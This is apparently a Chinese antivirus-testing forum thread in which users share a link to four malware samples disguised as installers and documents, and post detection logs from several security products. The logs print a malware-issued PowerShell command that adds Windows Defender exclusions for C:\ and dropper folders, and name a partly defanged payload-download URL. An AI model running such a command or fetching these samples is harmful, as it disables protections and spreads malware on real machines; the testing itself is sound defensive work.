样本x4

kyuno1

https://t.wss.ink/f/ak5jf2xwpku 复制链接到浏览器打开
kis 扫描全miss 实体机未双击测试

aboringman

打不过就叫外援（

1. 日志
   
2. C:\Users\Killer\Desktop\毒x4\毒\2023海外精料K2.5.exe > INDIGOROSE > C:\ProgramData\data\UPX.rar > RAR >  - 错误 - 文件受密码保护
   
3. C:\Users\Killer\Desktop\毒x4\毒\2023海外精料K2.5.exe > INDIGOROSE > On Post Install_0.lua - Win32/Farfli.CNM.Gen 特洛伊木马 - 已通过删除清除 [1]
   
4. C:\Users\Killer\Desktop\毒x4\毒\点击安装中文zh-cn语言包.exe - ML/Augur 特洛伊木马 - 已通过删除清除 [1]
   
5. C:\Users\Killer\Desktop\毒x4\毒\粉转三方接待话术-docx.exe - Win32/Kryptik_AGen.AZF 特洛伊木马 的变量 - 已通过删除清除 [1]

复制代码

点击此处安装语言包.exe：

运行，触发监控及网页防护。(但UAC还是被爆了，被监控干掉的两个里其中一个是断网工具，另一个报的是木马下载器）

1. C:\Users\Public\Documents\update.lnk：Win32/TrojanDownloader.Agent.GOF 特洛伊木马
   
2. 
   
3. C:\Users\Public\Documents\k4.exe：Win32/RiskWare.NetDisabler.A 应用程序

复制代码

1. http://i[[[mgcache.cloudservicesdevc.tk/picturess/2023/2.166.txt：已阻止
   
2. 
   
3. http://i[[[mgcache.cloudservicesdevc.tk/picturess/2023/2.166.txt：已阻止

复制代码

然后废了（

秋日之殇

pdm杀了2个，剩余2个中一个杀衍生物后无法执行，还有一个没有TG跑不起来。

117054487

秋日之殇 发表于 2023-2-22 02:04
pdm杀了2个，剩余2个中一个杀衍生物后无法执行，一个拦截恶意链接

补刀 另一个文件释放的exe有tx数签

kyuno1

aboringman 发表于 2023-2-22 01:45
打不过就叫外援（

已编辑

117054487

avast 落地杀了一下 剩余三个全部过cc 一个杀黑dll 一个idp 但我电脑的网络适配器等被禁用了 2023那个cc分析miss后运行但没有反应 （如果断网环境下双击三个程序都会显示idp）

莒县小哥

sichuanwenxuan

WD杀3个。双击剩下的应用程序，智量杀。

GreatMOLA

Bitdefender all
扫描
实时防护检测到威胁。该文件已被删除。C:\Users\TEST\Desktop\毒\粉转三方接待话术-docx.exe 是恶意软件 Gen:Variant.Zusy.451020
双击
点击此处安装语言包.exe - 高级威胁防护阻止了一个恶意进程。进程路径: C:\Users\TEST\Desktop\毒\点击此处安装语言包.exe. 威胁名称: ATC.SuspiciousBehavior.C22A93710BCCD88F.
点击安装中文zh-cn语言包.exe - 衍生物 实时防护检测到威胁。该文件已被删除。C:\Users\TEST\AppData\Roaming\Postex\LileiBase.dll 是恶意软件 Trojan.GenericKD.65444851
2023海外精料K2.5.exe ：

1. HyperDetect 机器学习检测到恶意命令行执行。The process C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe was allowed to run executing the malicious command line "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c if (Get-Process -Name OKokokok){}else{"Add-MpPreference -ExclusionPath $env:localappdata,'C:\','C:\PHP5433','C:\ProgramData\Program','C:\ProgramData\Program\GLUT32.dll','C:\ProgramData\Program\GLUT32.dll1','C:\ProgramData\Program\iusb3mon.exe','C:\PHP5433\php-cgi.exe','C:\un.exe','C:\PHP5433',([environment]::CurrentDirectory) -ExclusionExtension '.rar' -Force"}. In order to take action, please contact your system administrator.
   

复制代码

LastF1ame_

ESET剩一个没有报，双击给有能力的朋友（

1. 时间;扫描程序;对象类型;对象;检测;操作;用户;信息;哈希;此处首次所见
   
2. 2023/2/22 11:01:51;文件系统实时防护;文件;C:\毒x4\毒\点击安装中文zh-cn语言包.exe;Suspicious Object;已通过删除清除;
   
3. 2023/2/22 11:01:51;文件系统实时防护;文件;C:\\毒x4\毒\粉转三方接待话术-docx.exe;Win32/Kryptik_AGen.AZF 特洛伊木马 的变量;已通过删除清除
   
4. 2023/2/22 11:01:52;文件系统实时防护;文件;C:\\毒x4\毒\2023海外精料K2.5.exe;Win32/Farfli.CNM.Gen 特洛伊木马;已通过删除清除;
   

复制代码